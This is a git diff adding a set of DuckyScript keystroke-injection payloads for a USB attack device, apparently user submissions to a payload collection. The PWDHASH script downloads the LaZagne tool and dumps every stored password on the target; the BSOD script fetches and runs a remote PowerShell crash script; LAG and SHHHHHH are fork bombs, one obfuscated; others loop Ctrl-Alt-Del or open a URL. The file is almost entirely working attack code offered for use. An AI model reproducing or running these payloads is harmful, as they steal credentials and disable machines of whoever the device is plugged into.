diff --git a/submissions/ApplezDuck/scripts/ACTIVPANELREBOOT b/submissions/ApplezDuck/scripts/ACTIVPANELREBOOT new file mode 100644 index 0000000..6e86856 --- /dev/null +++ b/submissions/ApplezDuck/scripts/ACTIVPANELREBOOT @@ -0,0 +1,5 @@ +VAR x 1 + +WHILE $x == 1 + CTRL ALT DEL +END_WHILE diff --git a/submissions/ApplezDuck/scripts/BSOD b/submissions/ApplezDuck/scripts/BSOD new file mode 100644 index 0000000..99f3a2a --- /dev/null +++ b/submissions/ApplezDuck/scripts/BSOD @@ -0,0 +1,12 @@ +REM BSOD +REM ------------------------------------------------- + +GUI r +DELAY 1000 +STRING powershell +ENTER + +DELAY 2000 +STRING iex https://raw.githubusercontent.com/peewpw/Invoke-BSOD/master/Invoke-BSOD.ps1';Invoke-BSOD +REM this gets the script +ENTER \ No newline at end of file diff --git a/submissions/ApplezDuck/scripts/LAG b/submissions/ApplezDuck/scripts/LAG new file mode 100644 index 0000000..5fb069c --- /dev/null +++ b/submissions/ApplezDuck/scripts/LAG @@ -0,0 +1,10 @@ +VAR x 1 + +WHILE $x == 1 + GUI r + DELAY 750 + STRING cmd + ENTER + STRING echo %0 | %0 > cscr.bat + STRING start cscr.bat +END_WHILE \ No newline at end of file diff --git a/submissions/ApplezDuck/scripts/PWDHASH b/submissions/ApplezDuck/scripts/PWDHASH new file mode 100644 index 0000000..a7a2300 --- /dev/null +++ b/submissions/ApplezDuck/scripts/PWDHASH @@ -0,0 +1,12 @@ +GUI r +DELAY 750 +STRING cmd +ENTER +DELAY 1500 +STRING curl -sSLo %TEMP%\LaZagne.exe https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/LaZagne.exe && %TEMP%\LaZagne.exe all > .\LZg.txt && del %TEMP%\LaZagne.exe +DELAY 5000 +ENTER +DELAY 1000 +STRING notepad LZg.txt + + diff --git a/submissions/ApplezDuck/scripts/RICKROLL b/submissions/ApplezDuck/scripts/RICKROLL new file mode 100644 index 0000000..4c13d01 --- /dev/null +++ b/submissions/ApplezDuck/scripts/RICKROLL @@ -0,0 +1,6 @@ +REM i hate coding on my phjone + +GUI r +DELAY 500 +STRING msedge https://coolstuff.hackrland.dev +ENTER diff --git a/submissions/ApplezDuck/scripts/SHHHHHH b/submissions/ApplezDuck/scripts/SHHHHHH new file mode 100644 index 0000000..286ce11 --- /dev/null +++ b/submissions/ApplezDuck/scripts/SHHHHHH @@ -0,0 +1,7 @@ +GUI r +DELAY 1000 +STRING cmd +ENTER +DELAY 1750 +STRING @echo.%0^|%0>$^_^.c^md&$_>nul +ENTER diff --git a/submissions/ApplezDuck/scripts/SYSINFO b/submissions/ApplezDuck/scripts/SYSINFO new file mode 100644 index 0000000..ea2e848 --- /dev/null +++ b/submissions/ApplezDuck/scripts/SYSINFO @@ -0,0 +1,25 @@ +REM this is a script to fetch some system data to files +REM ------------------------------------------------------ + +FUNCTION IPCONFIG + GUI r + DELAY 750 + STRING cmd + ENTER + DELAY 1500 + STRING ipconfig > .IPCONFIG +END_FUNCTION + +FUNCTION ROUTE + GUI r + DELAY 750 + STRING cmd + ENTER + DELAY 1500 + STRING rdinfo > .RDINFO +END_FUNCTION + +CALL IPCONFIG + +CALL ROUTE +